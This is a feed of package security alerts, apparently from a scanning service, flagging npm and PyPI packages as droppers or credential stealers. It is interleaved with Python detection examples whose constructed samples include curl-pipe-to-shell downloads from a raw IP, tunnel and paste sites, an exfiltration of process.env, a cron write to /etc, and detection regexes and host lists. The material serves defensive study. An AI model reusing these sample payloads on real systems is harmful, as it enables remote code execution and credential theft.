Beta: Shoulder is in beta, so results can sometimes be wrong.

Security alerts

Signals from Shoulder's ecosystem analysis: newly scanned packages, identified risk changes, and surfaced weaknesses.

Alerts are generated when Shoulder analyses a package and identifies signals worth reviewing. Each alert links to a full threat briefing.

npm/@camstack/[email protected] MEDIUM

Manifest version doesn't match any embedded version constant in the bundle — bundle may not have been rebuilt from the published manifest; review release pipeline and corroborating signals

  • Dynamic eval + network + shell exec — dropper trio (arbitrary code execution, exfiltration channel, OS access)
  • Obfuscated shell execution — concealment pattern
  • Dynamic code evaluation with network access — potential code injection or exfiltration
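The "manifest version doesn't match any embedded version constant" signal above (and its repeats further down this feed) can be reproduced with a small check. What follows is an added example, not Shoulder's own analysis code: it extracts every semver-looking string literal from a built bundle and compares the set against the version declared in the manifest, returning a tri-state so that a bundle with no version literal at all is not reported as a mismatch. The bundle strings are constructed for this example.

```python
import re

# A quoted semver-style literal: "1.4.2", '2.0.0-beta.1', "3.1.0+build.7"
SEMVER_LITERAL = re.compile(
    r"""['"](\d+\.\d+\.\d+(?:-[0-9A-Za-z.-]+)?(?:\+[0-9A-Za-z.-]+)?)['"]"""
)

# Constructed sample bundles for this example (not real packages).
CLEAN_BUNDLE = 'var VERSION="1.4.2";module.exports={version:VERSION,axios:"0.27.2"};'
STALE_BUNDLE = 'var VERSION="1.4.1";module.exports={version:VERSION,axios:"0.27.2"};'
NO_CONSTANT_BUNDLE = "module.exports=function(){return 42};"


def embedded_versions(bundle_source: str) -> set:
    """Every semver-looking string literal in a built bundle: the package's own
    version constant, but also the versions of any bundled dependencies."""
    return set(SEMVER_LITERAL.findall(bundle_source))


def check_manifest_version(manifest_version: str, bundle_source: str) -> str:
    """Tri-state result:
      'match'       - the manifest version appears as a literal in the bundle
      'mismatch'    - version literals exist but none equals the manifest version
      'no-constant' - the bundle embeds no version literal at all, so there is
                      nothing to corroborate and the signal should not fire."""
    found = embedded_versions(bundle_source)
    if not found:
        return "no-constant"
    return "match" if manifest_version in found else "mismatch"


if __name__ == "__main__":
    for name, bundle in [("clean", CLEAN_BUNDLE), ("stale", STALE_BUNDLE), ("none", NO_CONSTANT_BUNDLE)]:
        print(name, check_manifest_version("1.4.2", bundle), sorted(embedded_versions(bundle)))
```

In practice, read `version` from the tarball's package.json and run the scan over every file in the tarball, not just the main bundle. The found set will normally contain dependency versions too (the `0.27.2` above), so a mismatch says only that the package's own version never made it into the build; that is why the feed treats it as a MEDIUM, corroborating signal rather than a verdict on its own.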

npm/@camstack/[email protected] MEDIUM

Manifest version doesn't match any embedded version constant in the bundle — bundle may not have been rebuilt from the published manifest; review release pipeline and corroborating signals

  • Dynamic code evaluation with network access — potential code injection or exfiltration

npm/@knapsack/[email protected] CRITICAL

Newly-introduced runtime execution surface (eval / shell / network) on a package published inside a coordinated burst of uninspectable ballooned bundles by the same maintainer account - stage-1 dropper precursor, failing closed

npm/@knapsack/[email protected] CRITICAL

Newly-introduced runtime execution surface (eval / shell / network) on a package published inside a coordinated burst of uninspectable ballooned bundles by the same maintainer account - stage-1 dropper precursor, failing closed

  • Dynamic eval + network access BOTH appeared in this version — hijack shape (payload-introduction signature; neither cap was present in the trust-anchor baseline)
  • Dynamic code evaluation with network access — potential code injection or exfiltration

npm/@mjasnikovs/[email protected] HIGH

Payload delivery from suspicious source: IOC URL + execution capability

  • Manifest version doesn't match any embedded version constant in the bundle — bundle may not have been rebuilt from the published manifest; review release pipeline and corroborating signals

npm/@ramonclaudio/[email protected] CRITICAL

Bulk env-var sweep + shell exec at runtime — credential-stealer

  • A dist-tag (e.g. latest) was moved to this version while it was less than 1 hour old — publish-side compromise indicator
  • Manifest version doesn't match any embedded version constant in the bundle — bundle may not have been rebuilt from the published manifest; review release pipeline and corroborating signals
  • Obfuscated shell execution — concealment pattern

npm/@reddb-io/[email protected] CRITICAL

Install-time payload delivery: remote fetch + execution during install

  • matched: verdict_payload_delivery_and_execution, verdict_suspicious_install_download_source, verdict_runtime_payload_delivery, verdict_suspicious_install_time_execution

npm/@reddb-io/[email protected] CRITICAL

Install-time suspicious download: evidence contains raw IP, tunnel service, or paste site URL

  • matched: verdict_suspicious_install_download_source, verdict_runtime_payload_delivery
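The two @reddb-io alerts above hinge on where an install script fetches from and whether the fetched content is executed. The following is an added example, not Shoulder's code: it pulls every URL out of an install script, classifies the host as a raw IP, a tunnel service, or a paste site, and separately flags the fetch-then-execute shape (a URL piped or chained into an interpreter). The host lists and the sample install script are constructed for the example; `192.0.2.10` is a documentation address, and none of the URLs are real IOCs.

```python
import ipaddress
import re
from typing import Optional
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.IGNORECASE)

# Host lists are constructed for this example; in practice feed them from your own intel.
TUNNEL_SUFFIXES = ("ngrok.io", "ngrok-free.app", "trycloudflare.com", "loca.lt", "localhost.run", "serveo.net")
PASTE_SUFFIXES = ("pastebin.com", "paste.ee", "hastebin.com", "rentry.co", "transfer.sh")

# Fetched content handed straight to an interpreter: "curl ... | sh", "wget ... && node x.js"
FETCH_TO_INTERP = re.compile(r"(?:\|\s*|&&\s*)(?:sudo\s+)?(?:sh|bash|zsh|node|python3?|perl)\b")

# Constructed install script used as sample input (nothing here is a real IOC).
SAMPLE_INSTALL_SH = """#!/bin/sh
curl -fsSL http://192.0.2.10:8080/stage1.sh | sh
wget -qO- https://abc123.ngrok-free.app/drop.tgz | tar xz
curl -s https://pastebin.com/raw/AbCdEf > /tmp/p.js && node /tmp/p.js
curl -s https://registry.npmjs.org/left-pad -o meta.json
"""


def _ends_with_any(host: str, suffixes) -> bool:
    return host in suffixes or host.endswith(tuple("." + s for s in suffixes))


def classify_host(host: str) -> Optional[str]:
    """'raw-ip', 'tunnel-service', 'paste-site', or None for an ordinary host."""
    host = host.lower().rstrip(".")
    try:
        ipaddress.ip_address(host)  # handles both IPv4 and IPv6 literals
        return "raw-ip"
    except ValueError:
        pass
    if _ends_with_any(host, TUNNEL_SUFFIXES):
        return "tunnel-service"
    if _ends_with_any(host, PASTE_SUFFIXES):
        return "paste-site"
    return None


def suspicious_download_sources(script: str) -> list:
    """(url, reason) for every URL whose host is a raw IP, tunnel service, or paste site."""
    hits = []
    for url in URL_RE.findall(script):
        reason = classify_host(urlparse(url).hostname or "")
        if reason:
            hits.append((url, reason))
    return hits


def fetch_then_execute(script: str) -> bool:
    """True when the script both fetches a URL and pipes or chains into an interpreter."""
    return bool(URL_RE.search(script)) and bool(FETCH_TO_INTERP.search(script))


if __name__ == "__main__":
    for url, reason in suspicious_download_sources(SAMPLE_INSTALL_SH):
        print(reason, url)
    print("fetch-then-execute:", fetch_then_execute(SAMPLE_INSTALL_SH))
```

The registry URL on the last line of the sample is left alone, which is the point: the signal is about the source, not about downloading as such. Raw-IP and tunnel hosts are cheap to flag because legitimate install scripts almost never need them; paste sites need a curated list, and that list is the part to keep current.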

npm/@vellumai/[email protected] MEDIUM

Dynamic / forked-detached shell paired with code obfuscation — runtime dropper attribution (no install hook required)

npm/[email protected] CRITICAL

Payload delivery from suspicious source: IOC URL + execution capability

  • Install hook spawns dynamic / forked-detached shell — dropper attribution
  • Manifest version doesn't match any embedded version constant in the bundle — bundle may not have been rebuilt from the published manifest; review release pipeline and corroborating signals
  • Install hook + shell exec + network — dropper shape (scopes may be install or runtime; install hook can transitively reach runtime caps via the postinstall entrypoint)

npm/[email protected] MEDIUM

npm main entrypoint contains side-effecting code AFTER its last module.exports / export default — runs silently on require() and reaches a dangerous capability (install-hook bypass)
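The install-hook bypass described in this alert is simple to reason about once the entrypoint is split at its last export. As an added example (not Shoulder's code), the check below finds the last `module.exports` / `exports.x =` / `export default` line, walks forward until that statement's brackets close, and reports any non-comment code that follows, then greps that tail for the same dangerous capabilities the feed names. Bracket counting stands in for a real parser here; the two entrypoints are constructed for the example.

```python
import re

# Lines that export from a CommonJS or ESM entrypoint.
EXPORT_RE = re.compile(r"^\s*(?:module\.exports\b|exports\.\w+\s*=|export\s+default\b)")
# Lines that carry no code: blank or comment-only.
NOISE_RE = re.compile(r"^\s*(?:$|//|/\*|\*)")
# Capabilities that make trailing code worth a look (the shapes this feed reports).
DANGEROUS_RE = re.compile(
    r"child_process|\beval\s*\(|new\s+Function|require\(['\"](?:https?|net|dns)['\"]\)"
    r"|\bfetch\s*\(|process\.env(?![\w.\[])"
)

# Constructed entrypoints (not real packages).
CLEAN_ENTRY = """const api = require('./lib/api');
module.exports = {
  connect: api.connect,
  version: '1.2.0',
};
// end of file
"""

SNEAKY_ENTRY = """const api = require('./lib/api');
module.exports = { connect: api.connect };

// executes on every require(); no lifecycle hook needed
(function () {
  const { execSync } = require('child_process');
  const https = require('https');
  https.request({ host: 'example.invalid', method: 'POST' })
       .end(JSON.stringify(process.env));
  execSync('sh -c "true"');
})();
"""


def code_after_last_export(source: str) -> list:
    """Statements that follow the last export once its brackets close.
    Counting brackets (rather than parsing) keeps a multi-line
    'module.exports = { ... };' object from being reported as trailing code."""
    lines = source.splitlines()
    last = max((i for i, l in enumerate(lines) if EXPORT_RE.match(l)), default=None)
    if last is None:
        return []
    depth, end = 0, last
    for i in range(last, len(lines)):
        depth += lines[i].count("{") + lines[i].count("(") - lines[i].count("}") - lines[i].count(")")
        end = i
        if depth <= 0:
            break
    return [l for l in lines[end + 1:] if not NOISE_RE.match(l)]


def silent_loader_check(source: str) -> dict:
    tail = code_after_last_export(source)
    return {
        "has_trailing_code": bool(tail),
        "reaches_dangerous_cap": any(DANGEROUS_RE.search(l) for l in tail),
        "tail": tail,
    }


if __name__ == "__main__":
    for name, src in (("clean", CLEAN_ENTRY), ("sneaky", SNEAKY_ENTRY)):
        r = silent_loader_check(src)
        print(name, "trailing:", r["has_trailing_code"], "dangerous:", r["reaches_dangerous_cap"])
```

Trailing code by itself is common (a `module.exports` placed early followed by helper definitions), so the verdict only becomes interesting when the tail reaches a capability; brackets inside string literals can confuse the counter, which is the first thing to replace with an AST walk in production.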

npm/[email protected] CRITICAL

Suspicious install-time execution: 2+ suspicious signals during install

  • CLI bin entry points at the same file as a lifecycle script (preinstall/install/postinstall/prepare) — [email protected] dual-trigger
  • Bulk env-var sweep + shell exec at runtime — credential-stealer
  • Bulk env-var sweep (cap-bulk-env-access reads ALL of process.env) + outbound network — credential-stealer
  • Install hook spawns dynamic / forked-detached shell — dropper attribution
  • Install hook writes to system paths (/etc/, /usr/, etc.) — review for persistence
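The five bullets on this alert, together with the "bulk env-var sweep + shell exec" credential-stealer shape reported on the @ramonclaudio entry above, all fall out of one package-level scan. The block below is an added example, not Shoulder's own scanner: it parses a constructed package.json, resolves each lifecycle script to the file it runs, checks whether that file is also a `bin` entry (the dual trigger), and tags install-scope and runtime-scope capabilities with coarse regex heuristics before combining them into verdicts. The capability patterns, the verdict names, and the sample package are all assumptions made for this example.

```python
import json
import re
from pathlib import PurePosixPath

LIFECYCLE = ("preinstall", "install", "postinstall", "prepare")

# Capability heuristics over JavaScript source; regex-based and deliberately coarse.
CAPS = {
    # whole-object use of process.env (JSON.stringify(process.env), {...process.env}); process.env.FOO is excluded
    "bulk-env-access": re.compile(r"process\.env(?![\w.\[])"),
    "shell-exec": re.compile(r"require\(['\"]child_process['\"]\)|from\s+['\"]child_process['\"]|\b(?:execSync|spawnSync)\s*\("),
    "network": re.compile(r"require\(['\"](?:https?|net|dns|dgram)['\"]\)|\bfetch\s*\(|XMLHttpRequest"),
    "dynamic-eval": re.compile(r"\beval\s*\(|new\s+Function\s*\(|\bvm\.run"),
    "system-path-write": re.compile(r"writeFile(?:Sync)?\s*\(\s*['\"]/(?:etc|usr|bin|sbin|var|opt|Library)/"),
}

# Constructed sample package (not a real one): postinstall runs the same file that is
# exposed as the CLI bin, and that file sweeps the environment, shells out, talks to
# the network and writes under /etc.
SAMPLE_PACKAGE = {
    "package.json": json.dumps({
        "name": "example-cli", "version": "2.0.1", "main": "index.js",
        "bin": {"example-cli": "./bin/cli.js"},
        "scripts": {"postinstall": "node ./bin/cli.js --setup"},
    }),
    "bin/cli.js": (
        "const { execSync } = require('child_process');\n"
        "const https = require('https');\n"
        "const fs = require('fs');\n"
        "https.request({ host: 'example.invalid', method: 'POST' }).end(JSON.stringify(process.env));\n"
        "execSync(process.argv[2] === '--setup' ? 'id' : 'true');\n"
        "fs.writeFileSync('/etc/cron.d/example', '* * * * * root node cli.js');\n"
    ),
    "index.js": "module.exports = { hello: () => 'hi' };\n",
}
CLEAN_PACKAGE = {
    "package.json": json.dumps({"name": "clean", "version": "1.0.0", "main": "index.js"}),
    "index.js": "module.exports = { add: (a, b) => a + b };\n",
}


def capabilities(source: str) -> set:
    return {name for name, rx in CAPS.items() if rx.search(source)}


def script_target(command: str):
    """File a lifecycle command hands to node: 'node ./bin/cli.js --setup' -> 'bin/cli.js'."""
    m = re.match(r"\s*(?:node|bun)\s+([^\s&|;]+)", command)
    return str(PurePosixPath(m.group(1))) if m else None


def scan_package(files: dict) -> dict:
    manifest = json.loads(files["package.json"])
    scripts = manifest.get("scripts", {})
    bins = manifest.get("bin", {})
    if isinstance(bins, str):  # "bin": "./cli.js" shorthand
        bins = {manifest["name"]: bins}
    bin_targets = {str(PurePosixPath(p)) for p in bins.values()}

    findings = {"install": set(), "runtime": set(), "dual_trigger": []}
    for hook in LIFECYCLE:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        target = script_target(cmd)
        if target in bin_targets:
            findings["dual_trigger"].append((hook, target))
        # install scope: the hook's own command line plus the file it runs
        findings["install"] |= capabilities(cmd + "\n" + files.get(target or "", ""))

    # runtime scope: the main entrypoint and every bin (what require() or a user reaches)
    for path in [str(PurePosixPath(manifest.get("main", "index.js")))] + sorted(bin_targets):
        findings["runtime"] |= capabilities(files.get(path, ""))
    return findings


def verdicts(findings: dict) -> list:
    inst, run, out = findings["install"], findings["runtime"], []
    if findings["dual_trigger"]:
        out.append("bin-and-lifecycle dual trigger")
    if "bulk-env-access" in run and ({"shell-exec", "network"} & run):
        out.append("credential-stealer shape at runtime")
    if {"shell-exec", "network"} <= inst:
        out.append("install-hook dropper shape")
    if "system-path-write" in inst:
        out.append("install hook writes to a system path")
    return out


if __name__ == "__main__":
    found = scan_package(SAMPLE_PACKAGE)
    print(found)
    print(verdicts(found), verdicts(scan_package(CLEAN_PACKAGE)))
```

Scoping matters for triage: the same file counted once as install scope (reached through postinstall) and once as runtime scope (reached through the bin) is exactly the dual-trigger the alert describes, and it is why removing `--ignore-scripts` exposure alone does not neutralise such a package.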

npm/[email protected] CRITICAL

Newly-introduced runtime execution surface (eval / shell / network) on a package published inside a coordinated burst of uninspectable ballooned bundles by the same maintainer account - stage-1 dropper precursor, failing closed

pypi/[email protected] CRITICAL

Bulk env-var sweep + shell exec at runtime — credential-stealer

  • Bulk env-var sweep (cap-bulk-env-access reads ALL of the process environment; os.environ here, process.env in Node.js) + outbound network — credential-stealer

pypi/[email protected] MEDIUM

Dynamic / forked-detached shell paired with code obfuscation — runtime dropper attribution (no install hook required)

  • Dynamic eval + network + shell exec — dropper trio (arbitrary code execution, exfiltration channel, OS access)
  • Obfuscated shell execution — concealment pattern
  • Dynamic code evaluation with network access — potential code injection or exfiltration